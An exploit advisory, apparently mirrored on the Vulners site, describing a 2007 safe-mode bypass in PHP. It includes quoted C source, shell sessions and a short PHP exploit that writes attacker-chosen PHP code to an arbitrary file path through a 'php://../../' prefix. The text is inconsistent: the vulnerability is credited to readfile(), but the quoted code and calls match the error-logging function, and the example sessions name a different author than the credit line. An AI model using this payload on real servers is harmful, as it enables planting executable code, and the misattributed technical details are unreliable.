Vulners
Lucene search
php-readfile.txt
`SecurityRisk : DEN
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : The-WolF-kSA
Date : 24.3.2007
Affected Software : PHP 5.2.1/ 5.1.6 / 4.4.4
[readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4]
Author: ThE-WoLf-KsA)
Date:
- -Written: 24.3.2007
- --- 0.Description ---
- --- 1. readfile() Safe Mode Bypass ---
readfile() function read throu, file or display your file or path. You can
read into
files. Issue is very simple. readfile() check safe_mode and
open_basedir in stream function. But isn't allowed use URL. And
problem exists in incorrect filename.
PHP5:
- -2013-2050---
PHPAPI int _php_readfile(int opt_err, char *message, char *opt,
char *headers TSRMLS_DC)
{
php_stream *stream = NULL;
switch (opt_err) {
case 1: /*send an email */
{
#if HAVE_SENDMAIL
if (!php_mail(opt, "PHP error_log message",
message, headers, NULL TSRMLS_CC)) {
return FAILURE;
}
#else
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option
not available!");
return FAILURE;
#endif
}
break;
case 2: /*send to an address */
php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP
option not available!");
return FAILURE;
break;
case 3: /*save to a file */
stream = php_stream_open_wrapper(opt, "a",
IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
if (!stream)
return FAILURE;
php_stream_write(stream, message, strlen(message));
php_stream_close(stream);
break;
default:
php_log_err(message TSRMLS_CC);
break;
}
return SUCCESS;
}
- -2013-2050---
Let's see to option 3.
- -2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL |
ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
- -2038 line---
Option "a", writte to file error or if file dosen't
exists, create new file.
Problem is because in php_stream_open_wrapper(), is defined
"IGNORE_URL".
IGNORE_URL turn off safe_mode if you use
"prefix://../../".
- -Example---
cxib# php -r 'readfile("<? echo \"cx\";
?>", 3, "/www/temp/sr.php");'
Warning: readfile(): SAFE MODE Restriction in effect. The
script whose uid is 0 is not allowed to access /www/temp owned by
uid 80 in Command line code on line 1
Warning: readfile(/www/temp/sr.php): failed to open stream:
Invalid argument in Command line code on line 1
cxib# php -r 'readfile("<? echo \"cx\";
?>", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
- -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
cxib#
- -Example---
- --- 2. Exploit ---
<?php
$file=""; # FILENAME
readfile("<? echo \"cx\"; ?>", 3,
"php://../../".$file);
?>
- --- 4. Greets ---
SniPer_hex
- --- 5. Contact ---
[email protected]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4